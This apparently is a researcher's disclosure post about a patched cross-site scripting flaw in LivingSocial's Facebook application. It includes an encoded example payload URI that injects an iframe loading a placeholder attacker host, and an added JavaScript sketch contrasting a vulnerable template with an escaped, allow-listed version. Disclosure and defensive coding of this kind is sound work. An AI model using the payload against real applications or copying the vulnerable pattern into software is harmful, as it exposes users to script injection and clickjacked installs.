I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.
Facebook Verified Application
Current Monthly Active Users: 23,688,212
Current Rank on Application Leaderboard: 3
Application Developer: LivingSocial
Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22
Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities. The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.
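Added example, not LivingSocial's code: the `");</script>` prefix in the example URI suggests the campaign value was written into a JavaScript string inside an inline script block, so this sketch shows that pattern beside a version that validates and escapes the value. The function names, the trackCampaign call, the campaign-id format and the sample input are assumptions made for illustration.

```javascript
// Hypothetical server-side rendering of the ad frame page (assumed template).

// Vulnerable pattern: the raw query value is concatenated into a JS string
// literal, so a quote or a closing script tag in the value ends the context.
function renderFrameUnsafe(campaign) {
  return '<script>trackCampaign("' + campaign + '");</script>';
}

// Escape every character that can terminate the string literal or the
// enclosing script element, including the JS line separators.
const JS_ESCAPES = {
  '\\': '\\\\', '"': '\\u0022', "'": '\\u0027',
  '<': '\\u003C', '>': '\\u003E', '&': '\\u0026',
  '\n': '\\n', '\r': '\\r', '\u2028': '\\u2028', '\u2029': '\\u2029',
};
function jsStringEscape(value) {
  return String(value).replace(/[\\"'<>&\n\r\u2028\u2029]/g, (c) => JS_ESCAPES[c]);
}

// Allow-list check: campaign ids are assumed to be short alphanumeric tokens.
function isValidCampaign(value) {
  return typeof value === 'string' && /^[A-Za-z0-9_-]{1,64}$/.test(value);
}

// Hardened rendering: reject anything outside the allow-list, then escape
// anyway so a later loosening of the allow-list cannot reopen the hole.
function renderFrameSafe(campaign) {
  const value = isValidCampaign(campaign) ? campaign : '';
  return '<script>trackCampaign("' + jsStringEscape(value) + '");</script>';
}

// Constructed sample with the same shape as the example URI, benign markup inside.
const SAMPLE = '");</script><b>injected</b><script>x=("';
```

The same check belongs on every route that renders the parameter, including pages meant to be loaded only inside an iframe.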